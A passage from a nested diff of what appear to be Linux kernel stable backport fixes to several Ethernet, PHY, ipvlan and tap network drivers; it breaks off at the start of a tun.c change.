+ 	if (!is_completed)
+ 		ret = -EBADE;
+@@ -528,7 +545,7 @@ int hclge_comm_cmd_queue_init(struct pci_dev *pdev, struct hclge_comm_hw *hw)
+ 	cmdq->crq.desc_num = HCLGE_COMM_NIC_CMQ_DESC_NUM;
+ 
+ 	/* Setup Tx write back timeout */
+-	cmdq->tx_timeout = HCLGE_COMM_CMDQ_TX_TIMEOUT;
++	cmdq->tx_timeout = HCLGE_COMM_CMDQ_TX_TIMEOUT_DEFAULT;
+ 
+ 	/* Setup queue rings */
+ 	ret = hclge_comm_alloc_cmd_queue(hw, HCLGE_COMM_TYPE_CSQ);
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.h b/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.h
+index b1f9383b418f4..2b2928c6dccfc 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.h
+@@ -54,7 +54,8 @@
+ #define HCLGE_COMM_NIC_SW_RST_RDY		BIT(HCLGE_COMM_NIC_SW_RST_RDY_B)
+ #define HCLGE_COMM_NIC_CMQ_DESC_NUM_S		3
+ #define HCLGE_COMM_NIC_CMQ_DESC_NUM		1024
+-#define HCLGE_COMM_CMDQ_TX_TIMEOUT		30000
++#define HCLGE_COMM_CMDQ_TX_TIMEOUT_DEFAULT	30000
++#define HCLGE_COMM_CMDQ_TX_TIMEOUT_500MS	500000
+ 
+ enum hclge_opcode_type {
+ 	/* Generic commands */
+@@ -357,6 +358,11 @@ struct hclge_comm_caps_bit_map {
+ 	u16 local_bit;
+ };
+ 
++struct hclge_cmdq_tx_timeout_map {
++	u32 opcode;
++	u32 tx_timeout;
++};
++
+ struct hclge_comm_firmware_compat_cmd {
+ 	__le32 compat;
+ 	u8 rsv[20];
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+index 66feb23f7b7b6..bcccd82a2620f 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+@@ -130,7 +130,7 @@ static struct hns3_dbg_cmd_info hns3_dbg_cmd[] = {
+ 		.name = "tx_bd_queue",
+ 		.cmd = HNAE3_DBG_CMD_TX_BD,
+ 		.dentry = HNS3_DBG_DENTRY_TX_BD,
+-		.buf_len = HNS3_DBG_READ_LEN_4MB,
++		.buf_len = HNS3_DBG_READ_LEN_5MB,
+ 		.init = hns3_dbg_bd_file_init,
+ 	},
+ 	{
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.h b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.h
+index 97578eabb7d8b..4a5ef8a90a104 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.h
+@@ -10,6 +10,7 @@
+ #define HNS3_DBG_READ_LEN_128KB	0x20000
+ #define HNS3_DBG_READ_LEN_1MB	0x100000
+ #define HNS3_DBG_READ_LEN_4MB	0x400000
++#define HNS3_DBG_READ_LEN_5MB	0x500000
+ #define HNS3_DBG_WRITE_LEN	1024
+ 
+ #define HNS3_DBG_DATA_STR_LEN	32
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 07ad5f35219e2..50e956d6c3b25 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -8053,12 +8053,15 @@ static void hclge_ae_stop(struct hnae3_handle *handle)
+ 	/* If it is not PF reset or FLR, the firmware will disable the MAC,
+ 	 * so it only need to stop phy here.
+ 	 */
+-	if (test_bit(HCLGE_STATE_RST_HANDLING, &hdev->state) &&
+-	    hdev->reset_type != HNAE3_FUNC_RESET &&
+-	    hdev->reset_type != HNAE3_FLR_RESET) {
+-		hclge_mac_stop_phy(hdev);
+-		hclge_update_link_status(hdev);
+-		return;
++	if (test_bit(HCLGE_STATE_RST_HANDLING, &hdev->state)) {
++		hclge_pfc_pause_en_cfg(hdev, HCLGE_PFC_TX_RX_DISABLE,
++				       HCLGE_PFC_DISABLE);
++		if (hdev->reset_type != HNAE3_FUNC_RESET &&
++		    hdev->reset_type != HNAE3_FLR_RESET) {
++			hclge_mac_stop_phy(hdev);
++			hclge_update_link_status(hdev);
++			return;
++		}
+ 	}
+ 
+ 	hclge_reset_tqp(handle);
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
+index 4a33f65190e2b..922c0da3660c7 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
+@@ -171,8 +171,8 @@ int hclge_mac_pause_en_cfg(struct hclge_dev *hdev, bool tx, bool rx)
+ 	return hclge_cmd_send(&hdev->hw, &desc, 1);
+ }
+ 
+-static int hclge_pfc_pause_en_cfg(struct hclge_dev *hdev, u8 tx_rx_bitmap,
+-				  u8 pfc_bitmap)
++int hclge_pfc_pause_en_cfg(struct hclge_dev *hdev, u8 tx_rx_bitmap,
++			   u8 pfc_bitmap)
+ {
+ 	struct hclge_desc desc;
+ 	struct hclge_pfc_en_cmd *pfc = (struct hclge_pfc_en_cmd *)desc.data;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.h b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.h
+index 68f28a98e380b..dd6f1fd486cf2 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.h
+@@ -164,6 +164,9 @@ struct hclge_bp_to_qs_map_cmd {
+ 	u32 rsvd1;
+ };
+ 
++#define HCLGE_PFC_DISABLE	0
++#define HCLGE_PFC_TX_RX_DISABLE	0
++
+ struct hclge_pfc_en_cmd {
+ 	u8 tx_rx_en_bitmap;
+ 	u8 pri_en_bitmap;
+@@ -235,6 +238,8 @@ void hclge_tm_schd_info_update(struct hclge_dev *hdev, u8 num_tc);
+ void hclge_tm_pfc_info_update(struct hclge_dev *hdev);
+ int hclge_tm_dwrr_cfg(struct hclge_dev *hdev);
+ int hclge_tm_init_hw(struct hclge_dev *hdev, bool init);
++int hclge_pfc_pause_en_cfg(struct hclge_dev *hdev, u8 tx_rx_bitmap,
++			   u8 pfc_bitmap);
+ int hclge_mac_pause_en_cfg(struct hclge_dev *hdev, bool tx, bool rx);
+ int hclge_pause_addr_cfg(struct hclge_dev *hdev, const u8 *mac_addr);
+ void hclge_pfc_rx_stats_get(struct hclge_dev *hdev, u64 *stats);
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+index e84e5be8e59ed..b1b14850e958f 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+@@ -1436,7 +1436,10 @@ static int hclgevf_reset_wait(struct hclgevf_dev *hdev)
+ 	 * might happen in case reset assertion was made by PF. Yes, this also
+ 	 * means we might end up waiting bit more even for VF reset.
+ 	 */
+-	msleep(5000);
++	if (hdev->reset_type == HNAE3_VF_FULL_RESET)
++		msleep(5000);
++	else
++		msleep(500);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index cfc57cfc46e42..6a50f8ba3940c 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -573,7 +573,7 @@ ice_prepare_for_reset(struct ice_pf *pf, enum ice_reset_req reset_type)
+ 	/* Disable VFs until reset is completed */
+ 	mutex_lock(&pf->vfs.table_lock);
+ 	ice_for_each_vf(pf, bkt, vf)
+-		ice_set_vf_state_qs_dis(vf);
++		ice_set_vf_state_dis(vf);
+ 	mutex_unlock(&pf->vfs.table_lock);
+ 
+ 	if (ice_is_eswitch_mode_switchdev(pf)) {
+diff --git a/drivers/net/ethernet/intel/ice/ice_sriov.c b/drivers/net/ethernet/intel/ice/ice_sriov.c
+index b3849bc3d4fc6..b8c31bf721ad1 100644
+--- a/drivers/net/ethernet/intel/ice/ice_sriov.c
++++ b/drivers/net/ethernet/intel/ice/ice_sriov.c
+@@ -696,6 +696,21 @@ static void ice_sriov_free_vf(struct ice_vf *vf)
+ 	kfree_rcu(vf, rcu);
+ }
+ 
++/**
++ * ice_sriov_clear_reset_state - clears VF Reset status register
++ * @vf: the vf to configure
++ */
++static void ice_sriov_clear_reset_state(struct ice_vf *vf)
++{
++	struct ice_hw *hw = &vf->pf->hw;
++
++	/* Clear the reset status register so that VF immediately sees that
++	 * the device is resetting, even if hardware hasn't yet gotten around
++	 * to clearing VFGEN_RSTAT for us.
++	 */
++	wr32(hw, VFGEN_RSTAT(vf->vf_id), VIRTCHNL_VFR_INPROGRESS);
++}
++
+ /**
+  * ice_sriov_clear_mbx_register - clears SRIOV VF's mailbox registers
+  * @vf: the vf to configure
+@@ -835,6 +850,7 @@ static void ice_sriov_post_vsi_rebuild(struct ice_vf *vf)
+ static const struct ice_vf_ops ice_sriov_vf_ops = {
+ 	.reset_type = ICE_VF_RESET,
+ 	.free = ice_sriov_free_vf,
++	.clear_reset_state = ice_sriov_clear_reset_state,
+ 	.clear_mbx_register = ice_sriov_clear_mbx_register,
+ 	.trigger_reset_register = ice_sriov_trigger_reset_register,
+ 	.poll_reset_status = ice_sriov_poll_reset_status,
+@@ -1224,7 +1240,7 @@ int ice_set_vf_spoofchk(struct net_device *netdev, int vf_id, bool ena)
+ 	if (!vf)
+ 		return -EINVAL;
+ 
+-	ret = ice_check_vf_ready_for_cfg(vf);
++	ret = ice_check_vf_ready_for_reset(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+ 
+@@ -1339,7 +1355,7 @@ int ice_set_vf_mac(struct net_device *netdev, int vf_id, u8 *mac)
+ 		goto out_put_vf;
+ 	}
+ 
+-	ret = ice_check_vf_ready_for_cfg(vf);
++	ret = ice_check_vf_ready_for_reset(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+ 
+@@ -1393,7 +1409,7 @@ int ice_set_vf_trust(struct net_device *netdev, int vf_id, bool trusted)
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	ret = ice_check_vf_ready_for_cfg(vf);
++	ret = ice_check_vf_ready_for_reset(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+ 
+@@ -1706,7 +1722,7 @@ ice_set_vf_port_vlan(struct net_device *netdev, int vf_id, u16 vlan_id, u8 qos,
+ 	if (!vf)
+ 		return -EINVAL;
+ 
+-	ret = ice_check_vf_ready_for_cfg(vf);
++	ret = ice_check_vf_ready_for_reset(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_vf_lib.c b/drivers/net/ethernet/intel/ice/ice_vf_lib.c
+index 1c51778db951b..71047fc341392 100644
+--- a/drivers/net/ethernet/intel/ice/ice_vf_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_vf_lib.c
+@@ -185,6 +185,25 @@ int ice_check_vf_ready_for_cfg(struct ice_vf *vf)
+ 	return 0;
+ }
+ 
++/**
++ * ice_check_vf_ready_for_reset - check if VF is ready to be reset
++ * @vf: VF to check if it's ready to be reset
++ *
++ * The purpose of this function is to ensure that the VF is not in reset,
++ * disabled, and is both initialized and active, thus enabling us to safely
++ * initialize another reset.
++ */
++int ice_check_vf_ready_for_reset(struct ice_vf *vf)
++{
++	int ret;
++
++	ret = ice_check_vf_ready_for_cfg(vf);
++	if (!ret && !test_bit(ICE_VF_STATE_ACTIVE, vf->vf_states))
++		ret = -EAGAIN;
++
++	return ret;
++}
++
+ /**
+  * ice_trigger_vf_reset - Reset a VF on HW
+  * @vf: pointer to the VF structure
+@@ -673,7 +692,7 @@ out_unlock:
+  * ice_set_vf_state_qs_dis - Set VF queues state to disabled
+  * @vf: pointer to the VF structure
+  */
+-void ice_set_vf_state_qs_dis(struct ice_vf *vf)
++static void ice_set_vf_state_qs_dis(struct ice_vf *vf)
+ {
+ 	/* Clear Rx/Tx enabled queues flag */
+ 	bitmap_zero(vf->txq_ena, ICE_MAX_RSS_QS_PER_VF);
+@@ -681,6 +700,16 @@ void ice_set_vf_state_qs_dis(struct ice_vf *vf)
+ 	clear_bit(ICE_VF_STATE_QS_ENA, vf->vf_states);
+ }
+ 
++/**
++ * ice_set_vf_state_dis - Set VF state to disabled
++ * @vf: pointer to the VF structure
++ */
++void ice_set_vf_state_dis(struct ice_vf *vf)
++{
++	ice_set_vf_state_qs_dis(vf);
++	vf->vf_ops->clear_reset_state(vf);
++}
++
+ /* Private functions only accessed from other virtualization files */
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ice/ice_vf_lib.h b/drivers/net/ethernet/intel/ice/ice_vf_lib.h
+index 52bd9a3816bf2..e5bed85724622 100644
+--- a/drivers/net/ethernet/intel/ice/ice_vf_lib.h
++++ b/drivers/net/ethernet/intel/ice/ice_vf_lib.h
+@@ -56,6 +56,7 @@ struct ice_mdd_vf_events {
+ struct ice_vf_ops {
+ 	enum ice_disq_rst_src reset_type;
+ 	void (*free)(struct ice_vf *vf);
++	void (*clear_reset_state)(struct ice_vf *vf);
+ 	void (*clear_mbx_register)(struct ice_vf *vf);
+ 	void (*trigger_reset_register)(struct ice_vf *vf, bool is_vflr);
+ 	bool (*poll_reset_status)(struct ice_vf *vf);
+@@ -213,7 +214,8 @@ u16 ice_get_num_vfs(struct ice_pf *pf);
+ struct ice_vsi *ice_get_vf_vsi(struct ice_vf *vf);
+ bool ice_is_vf_disabled(struct ice_vf *vf);
+ int ice_check_vf_ready_for_cfg(struct ice_vf *vf);
+-void ice_set_vf_state_qs_dis(struct ice_vf *vf);
++int ice_check_vf_ready_for_reset(struct ice_vf *vf);
++void ice_set_vf_state_dis(struct ice_vf *vf);
+ bool ice_is_any_vf_in_unicast_promisc(struct ice_pf *pf);
+ void
+ ice_vf_get_promisc_masks(struct ice_vf *vf, struct ice_vsi *vsi,
+@@ -259,7 +261,7 @@ static inline int ice_check_vf_ready_for_cfg(struct ice_vf *vf)
+ 	return -EOPNOTSUPP;
+ }
+ 
+-static inline void ice_set_vf_state_qs_dis(struct ice_vf *vf)
++static inline void ice_set_vf_state_dis(struct ice_vf *vf)
+ {
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl.c b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+index 2b4c791b6cbad..ef3c709d6a750 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+@@ -3722,6 +3722,7 @@ error_handler:
+ 		ice_vc_notify_vf_link_state(vf);
+ 		break;
+ 	case VIRTCHNL_OP_RESET_VF:
++		clear_bit(ICE_VF_STATE_ACTIVE, vf->vf_states);
+ 		ops->reset_vf(vf);
+ 		break;
+ 	case VIRTCHNL_OP_ADD_ETH_ADDR:
+diff --git a/drivers/net/ethernet/intel/igb/e1000_mac.c b/drivers/net/ethernet/intel/igb/e1000_mac.c
+index 205d577bdbbaa..caf91c6f52b4d 100644
+--- a/drivers/net/ethernet/intel/igb/e1000_mac.c
++++ b/drivers/net/ethernet/intel/igb/e1000_mac.c
+@@ -426,7 +426,7 @@ void igb_mta_set(struct e1000_hw *hw, u32 hash_value)
+ static u32 igb_hash_mc_addr(struct e1000_hw *hw, u8 *mc_addr)
+ {
+ 	u32 hash_value, hash_mask;
+-	u8 bit_shift = 0;
++	u8 bit_shift = 1;
+ 
+ 	/* Register count multiplied by bits per register */
+ 	hash_mask = (hw->mac.mta_reg_count * 32) - 1;
+@@ -434,7 +434,7 @@ static u32 igb_hash_mc_addr(struct e1000_hw *hw, u8 *mc_addr)
+ 	/* For a mc_filter_type of 0, bit_shift is the number of left-shifts
+ 	 * where 0xFF would still fall within the hash mask.
+ 	 */
+-	while (hash_mask >> bit_shift != 0xFF)
++	while (hash_mask >> bit_shift != 0xFF && bit_shift < 4)
+ 		bit_shift++;
+ 
+ 	/* The portion of the address that is used for the hash table
+diff --git a/drivers/net/ethernet/mscc/vsc7514_regs.c b/drivers/net/ethernet/mscc/vsc7514_regs.c
+index 9d2d3e13cacfa..66c4284196143 100644
+--- a/drivers/net/ethernet/mscc/vsc7514_regs.c
++++ b/drivers/net/ethernet/mscc/vsc7514_regs.c
+@@ -252,15 +252,15 @@ const u32 vsc7514_sys_regmap[] = {
+ 	REG(SYS_COUNT_DROP_YELLOW_PRIO_4,		0x000218),
+ 	REG(SYS_COUNT_DROP_YELLOW_PRIO_5,		0x00021c),
+ 	REG(SYS_COUNT_DROP_YELLOW_PRIO_6,		0x000220),
+-	REG(SYS_COUNT_DROP_YELLOW_PRIO_7,		0x000214),
+-	REG(SYS_COUNT_DROP_GREEN_PRIO_0,		0x000218),
+-	REG(SYS_COUNT_DROP_GREEN_PRIO_1,		0x00021c),
+-	REG(SYS_COUNT_DROP_GREEN_PRIO_2,		0x000220),
+-	REG(SYS_COUNT_DROP_GREEN_PRIO_3,		0x000224),
+-	REG(SYS_COUNT_DROP_GREEN_PRIO_4,		0x000228),
+-	REG(SYS_COUNT_DROP_GREEN_PRIO_5,		0x00022c),
+-	REG(SYS_COUNT_DROP_GREEN_PRIO_6,		0x000230),
+-	REG(SYS_COUNT_DROP_GREEN_PRIO_7,		0x000234),
++	REG(SYS_COUNT_DROP_YELLOW_PRIO_7,		0x000224),
++	REG(SYS_COUNT_DROP_GREEN_PRIO_0,		0x000228),
++	REG(SYS_COUNT_DROP_GREEN_PRIO_1,		0x00022c),
++	REG(SYS_COUNT_DROP_GREEN_PRIO_2,		0x000230),
++	REG(SYS_COUNT_DROP_GREEN_PRIO_3,		0x000234),
++	REG(SYS_COUNT_DROP_GREEN_PRIO_4,		0x000238),
++	REG(SYS_COUNT_DROP_GREEN_PRIO_5,		0x00023c),
++	REG(SYS_COUNT_DROP_GREEN_PRIO_6,		0x000240),
++	REG(SYS_COUNT_DROP_GREEN_PRIO_7,		0x000244),
+ 	REG(SYS_RESET_CFG,				0x000508),
+ 	REG(SYS_CMID,					0x00050c),
+ 	REG(SYS_VLAN_ETYPE_CFG,				0x000510),
+diff --git a/drivers/net/ethernet/pasemi/pasemi_mac.c b/drivers/net/ethernet/pasemi/pasemi_mac.c
+index aaab590ef548d..ed7dd0a042355 100644
+--- a/drivers/net/ethernet/pasemi/pasemi_mac.c
++++ b/drivers/net/ethernet/pasemi/pasemi_mac.c
+@@ -1423,7 +1423,7 @@ static void pasemi_mac_queue_csdesc(const struct sk_buff *skb,
+ 	write_dma_reg(PAS_DMA_TXCHAN_INCR(txring->chan.chno), 2);
+ }
+ 
+-static int pasemi_mac_start_tx(struct sk_buff *skb, struct net_device *dev)
++static netdev_tx_t pasemi_mac_start_tx(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	struct pasemi_mac * const mac = netdev_priv(dev);
+ 	struct pasemi_mac_txring * const txring = tx_ring(mac);
+diff --git a/drivers/net/ethernet/sfc/ef100_netdev.c b/drivers/net/ethernet/sfc/ef100_netdev.c
+index ddcc325ed5701..c6b9ba6803c8d 100644
+--- a/drivers/net/ethernet/sfc/ef100_netdev.c
++++ b/drivers/net/ethernet/sfc/ef100_netdev.c
+@@ -372,7 +372,9 @@ int ef100_probe_netdev(struct efx_probe_data *probe_data)
+ 	efx->net_dev = net_dev;
+ 	SET_NETDEV_DEV(net_dev, &efx->pci_dev->dev);
+ 
+-	net_dev->features |= efx->type->offload_features;
++	/* enable all supported features except rx-fcs and rx-all */
++	net_dev->features |= efx->type->offload_features &
++			     ~(NETIF_F_RXFCS | NETIF_F_RXALL);
+ 	net_dev->hw_features |= efx->type->offload_features;
+ 	net_dev->hw_enc_features |= efx->type->offload_features;
+ 	net_dev->vlan_features |= NETIF_F_HW_CSUM | NETIF_F_SG |
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac4.h b/drivers/net/ethernet/stmicro/stmmac/dwmac4.h
+index 71dad409f78b0..12c0e60809f47 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac4.h
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac4.h
+@@ -181,6 +181,7 @@ enum power_event {
+ #define GMAC4_LPI_CTRL_STATUS	0xd0
+ #define GMAC4_LPI_TIMER_CTRL	0xd4
+ #define GMAC4_LPI_ENTRY_TIMER	0xd8
++#define GMAC4_MAC_ONEUS_TIC_COUNTER	0xdc
+ 
+ /* LPI control and status defines */
+ #define GMAC4_LPI_CTRL_STATUS_LPITCSE	BIT(21)	/* LPI Tx Clock Stop Enable */
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+index 188a00065f66c..84276eb681d70 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+@@ -25,6 +25,7 @@ static void dwmac4_core_init(struct mac_device_info *hw,
+ 	struct stmmac_priv *priv = netdev_priv(dev);
+ 	void __iomem *ioaddr = hw->pcsr;
+ 	u32 value = readl(ioaddr + GMAC_CONFIG);
++	u32 clk_rate;
+ 
+ 	value |= GMAC_CORE_INIT;
+ 
+@@ -47,6 +48,10 @@ static void dwmac4_core_init(struct mac_device_info *hw,
+ 
+ 	writel(value, ioaddr + GMAC_CONFIG);
+ 
++	/* Configure LPI 1us counter to number of CSR clock ticks in 1us - 1 */
++	clk_rate = clk_get_rate(priv->plat->stmmac_clk);
++	writel((clk_rate / 1000000) - 1, ioaddr + GMAC4_MAC_ONEUS_TIC_COUNTER);
++
+ 	/* Enable GMAC interrupts */
+ 	value = GMAC_INT_DEFAULT_ENABLE;
+ 
+diff --git a/drivers/net/ethernet/sun/cassini.c b/drivers/net/ethernet/sun/cassini.c
+index 0aca193d9550d..800956d5464b4 100644
+--- a/drivers/net/ethernet/sun/cassini.c
++++ b/drivers/net/ethernet/sun/cassini.c
+@@ -5095,6 +5095,8 @@ err_out_iounmap:
+ 		cas_shutdown(cp);
+ 	mutex_unlock(&cp->pm_mutex);
+ 
++	vfree(cp->fw_data);
++
+ 	pci_iounmap(pdev, cp->regs);
+ 
+ 
+diff --git a/drivers/net/ipvlan/ipvlan_core.c b/drivers/net/ipvlan/ipvlan_core.c
+index bb1c298c1e78b..2de3bd3b0c278 100644
+--- a/drivers/net/ipvlan/ipvlan_core.c
++++ b/drivers/net/ipvlan/ipvlan_core.c
+@@ -436,6 +436,9 @@ static int ipvlan_process_v4_outbound(struct sk_buff *skb)
+ 		goto err;
+ 	}
+ 	skb_dst_set(skb, &rt->dst);
++
++	memset(IPCB(skb), 0, sizeof(*IPCB(skb)));
++
+ 	err = ip_local_out(net, skb->sk, skb);
+ 	if (unlikely(net_xmit_eval(err)))
+ 		dev->stats.tx_errors++;
+@@ -474,6 +477,9 @@ static int ipvlan_process_v6_outbound(struct sk_buff *skb)
+ 		goto err;
+ 	}
+ 	skb_dst_set(skb, dst);
++
++	memset(IP6CB(skb), 0, sizeof(*IP6CB(skb)));
++
+ 	err = ip6_local_out(net, skb->sk, skb);
+ 	if (unlikely(net_xmit_eval(err)))
+ 		dev->stats.tx_errors++;
+diff --git a/drivers/net/mdio/mdio-mvusb.c b/drivers/net/mdio/mdio-mvusb.c
+index d5eabddfdf51b..11e048136ac23 100644
+--- a/drivers/net/mdio/mdio-mvusb.c
++++ b/drivers/net/mdio/mdio-mvusb.c
+@@ -73,6 +73,7 @@ static int mvusb_mdio_probe(struct usb_interface *interface,
+ 	struct device *dev = &interface->dev;
+ 	struct mvusb_mdio *mvusb;
+ 	struct mii_bus *mdio;
++	int ret;
+ 
+ 	mdio = devm_mdiobus_alloc_size(dev, sizeof(*mvusb));
+ 	if (!mdio)
+@@ -93,7 +94,15 @@ static int mvusb_mdio_probe(struct usb_interface *interface,
+ 	mdio->write = mvusb_mdio_write;
+ 
+ 	usb_set_intfdata(interface, mvusb);
+-	return of_mdiobus_register(mdio, dev->of_node);
++	ret = of_mdiobus_register(mdio, dev->of_node);
++	if (ret)
++		goto put_dev;
++
++	return 0;
++
++put_dev:
++	usb_put_dev(mvusb->udev);
++	return ret;
+ }
+ 
+ static void mvusb_mdio_disconnect(struct usb_interface *interface)
+diff --git a/drivers/net/pcs/pcs-xpcs.c b/drivers/net/pcs/pcs-xpcs.c
+index dd88624593c71..3f882bce37f42 100644
+--- a/drivers/net/pcs/pcs-xpcs.c
++++ b/drivers/net/pcs/pcs-xpcs.c
+@@ -881,7 +881,7 @@ int xpcs_do_config(struct dw_xpcs *xpcs, phy_interface_t interface,
+ 
+ 	switch (compat->an_mode) {
+ 	case DW_AN_C73:
+-		if (phylink_autoneg_inband(mode)) {
++		if (test_bit(ETHTOOL_LINK_MODE_Autoneg_BIT, advertising)) {
+ 			ret = xpcs_config_aneg_c73(xpcs, compat);
+ 			if (ret)
+ 				return ret;
+diff --git a/drivers/net/phy/bcm-phy-lib.h b/drivers/net/phy/bcm-phy-lib.h
+index 9902fb1820997..729db441797a0 100644
+--- a/drivers/net/phy/bcm-phy-lib.h
++++ b/drivers/net/phy/bcm-phy-lib.h
+@@ -40,6 +40,11 @@ static inline int bcm_phy_write_exp_sel(struct phy_device *phydev,
+ 	return bcm_phy_write_exp(phydev, reg | MII_BCM54XX_EXP_SEL_ER, val);
+ }
+ 
++static inline int bcm_phy_read_exp_sel(struct phy_device *phydev, u16 reg)
++{
++	return bcm_phy_read_exp(phydev, reg | MII_BCM54XX_EXP_SEL_ER);
++}
++
+ int bcm54xx_auxctl_write(struct phy_device *phydev, u16 regnum, u16 val);
+ int bcm54xx_auxctl_read(struct phy_device *phydev, u16 regnum);
+ 
+diff --git a/drivers/net/phy/bcm7xxx.c b/drivers/net/phy/bcm7xxx.c
+index 75593e7d1118f..6cebf3aaa621f 100644
+--- a/drivers/net/phy/bcm7xxx.c
++++ b/drivers/net/phy/bcm7xxx.c
+@@ -487,7 +487,7 @@ static int bcm7xxx_16nm_ephy_afe_config(struct phy_device *phydev)
+ 	bcm_phy_write_misc(phydev, 0x0038, 0x0002, 0xede0);
+ 
+ 	/* Read CORE_EXPA9 */
+-	tmp = bcm_phy_read_exp(phydev, 0x00a9);
++	tmp = bcm_phy_read_exp_sel(phydev, 0x00a9);
+ 	/* CORE_EXPA9[6:1] is rcalcode[5:0] */
+ 	rcalcode = (tmp & 0x7e) / 2;
+ 	/* Correct RCAL code + 1 is -1% rprogr, LP: +16 */
+diff --git a/drivers/net/phy/dp83867.c b/drivers/net/phy/dp83867.c
+index 7446d5c6c7146..14990f8462ae3 100644
+--- a/drivers/net/phy/dp83867.c
++++ b/drivers/net/phy/dp83867.c
+@@ -42,6 +42,7 @@
+ #define DP83867_STRAP_STS1	0x006E
+ #define DP83867_STRAP_STS2	0x006f
+ #define DP83867_RGMIIDCTL	0x0086
++#define DP83867_DSP_FFE_CFG	0x012c
+ #define DP83867_RXFCFG		0x0134
+ #define DP83867_RXFPMD1	0x0136
+ #define DP83867_RXFPMD2	0x0137
+@@ -910,8 +911,27 @@ static int dp83867_phy_reset(struct phy_device *phydev)
+ 
+ 	usleep_range(10, 20);
+ 
+-	return phy_modify(phydev, MII_DP83867_PHYCTRL,
++	err = phy_modify(phydev, MII_DP83867_PHYCTRL,
+ 			 DP83867_PHYCR_FORCE_LINK_GOOD, 0);
++	if (err < 0)
++		return err;
++
++	/* Configure the DSP Feedforward Equalizer Configuration register to
++	 * improve short cable (< 1 meter) performance. This will not affect
++	 * long cable performance.
++	 */
++	err = phy_write_mmd(phydev, DP83867_DEVADDR, DP83867_DSP_FFE_CFG,
++			    0x0e81);
++	if (err < 0)
++		return err;
++
++	err = phy_write(phydev, DP83867_CTRL, DP83867_SW_RESTART);
++	if (err < 0)
++		return err;
++
++	usleep_range(10, 20);
++
++	return 0;
+ }
+ 
+ static void dp83867_link_change_notify(struct phy_device *phydev)
+diff --git a/drivers/net/tap.c b/drivers/net/tap.c
+index 760d8d1b6cba4..3c468ef8f245f 100644
+--- a/drivers/net/tap.c
++++ b/drivers/net/tap.c
+@@ -739,7 +739,7 @@ static ssize_t tap_get_user(struct tap_queue *q, void *msg_control,
+ 
+ 	/* Move network header to the right position for VLAN tagged packets */
+ 	if (eth_type_vlan(skb->protocol) &&
+-	    __vlan_get_protocol(skb, skb->protocol, &depth) != 0)
++	    vlan_get_protocol_and_depth(skb, skb->protocol, &depth) != 0)
+ 		skb_set_network_header(skb, depth);
+ 
+ 	/* copy skb_ubuf_info for callback when skb has no error */
+@@ -1180,7 +1180,7 @@ static int tap_get_user_xdp(struct tap_queue *q, struct xdp_buff *xdp)
+ 
+ 	/* Move network header to the right position for VLAN tagged packets */
+ 	if (eth_type_vlan(skb->protocol) &&
+-	    __vlan_get_protocol(skb, skb->protocol, &depth) != 0)
++	    vlan_get_protocol_and_depth(skb, skb->protocol, &depth) != 0)
+ 		skb_set_network_header(skb, depth);
+ 
+ 	rcu_read_lock();
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
